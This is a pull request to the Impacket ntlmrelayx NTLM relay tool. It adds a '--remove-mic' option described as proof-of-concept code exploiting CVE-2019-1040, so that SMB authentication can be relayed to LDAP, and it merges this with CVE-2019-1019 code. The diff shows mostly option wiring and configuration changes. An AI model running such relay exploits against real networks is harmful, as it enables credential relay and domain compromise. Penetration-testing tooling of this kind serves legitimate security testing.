### PR TITLE
Mic remove - CVE-2019-1040

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -153,11 +153,11 @@ def start_servers(options, threads):
         c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
         c.setSMB2Support(options.smb2support)
         c.setInterfaceIp(options.interface_ip)
+        c.setExploitOptions(options.remove_mic, options.remove_target)
 
 
         if server is HTTPRelayServer:
             c.setListeningPort(options.http_port)
-            c.setTargetRemoval(options.remove_target)
             c.setDomainAccount(options.machine_account, options.machine_hashes, options.domain)
         elif server is SMBRelayServer:
             c.setListeningPort(options.smb_port)
@@ -242,6 +242,7 @@ if __name__ == '__main__':
     parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
                                                                    'before serving a WPAD file.')
     parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
+    parser.add_argument('--remove-mic', action='store_true',help='Remove MIC (exploit CVE-2019-1040)')
 
     #SMB arguments
     smboptions = parser.add_argument_group("SMB client options")

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -255,7 +255,8 @@ class SMBRelayServer(Thread):
             client = connData['SMBClient']
             try:
                 challengeMessage = self.do_ntlm_negotiate(client, token)
-            except Exception:
+            except Exception as e:
+                LOG.debug("Exception:", exc_info=True)
                 # Log this target as processed for this client
                 self.targetprocessor.logTarget(self.target)
                 # Raise exception again to pass it on to the SMB server
@@ -298,12 +299,13 @@ class SMBRelayServer(Thread):
 
                 self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
                                             authenticateMessage['user_name'].decode('utf-16le'))).upper()
+
                 if rawNTLM is True:
                     respToken2 = SPNEGO_NegTokenResp()
                     respToken2['ResponseToken'] = securityBlob
                     securityBlob = respToken2.getData()
 
-                clientResponse, errorCode = self.do_ntlm_auth(client, securityBlob,
+                clientResponse, errorCode = self.do_ntlm_auth(client, token,
                                                               connData['CHALLENGE_MESSAGE']['challenge'])
             else:
                 # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -34,6 +34,7 @@ class NTLMRelayxConfig:
         self.randomtargets = False
         self.encoding = None
         self.ipv6 = False
+        self.remove_mic = False
 
         # WPAD options
         self.serve_wpad = False
@@ -159,5 +160,6 @@ class NTLMRelayxConfig:
         self.wpad_host = wpad_host
         self.wpad_auth_num = wpad_auth_num
 
-    def setTargetRemoval(self, remove_target):
+    def setExploitOptions(self, remove_mic, remove_target):
+        self.remove_mic = remove_mic
         self.remove_target = remove_target

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -121,6 +121,9 @@ class NTLMRelayxConfig:
         self.redirecthost = redirecthost
 
     def setDomainAccount(self, machineAccount, machineHashes, domainIp):
+        # Don't set this if we're not exploiting it
+        if not self.remove_target:
+            return
         if machineAccount is None or machineHashes is None or domainIp is None:
             raise Exception("You must specify machine-account/hashes/domain all together!")
         self.machineAccount = machineAccount


### PR DESCRIPTION
Added POC code for CVE-2019-1040, removes the MIC when specified. This allows for relaying SMB to LDAP without issues. See https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/ for examples.

Also merged it with the CVE-2019-1019 POC code and fixed a small bug in it.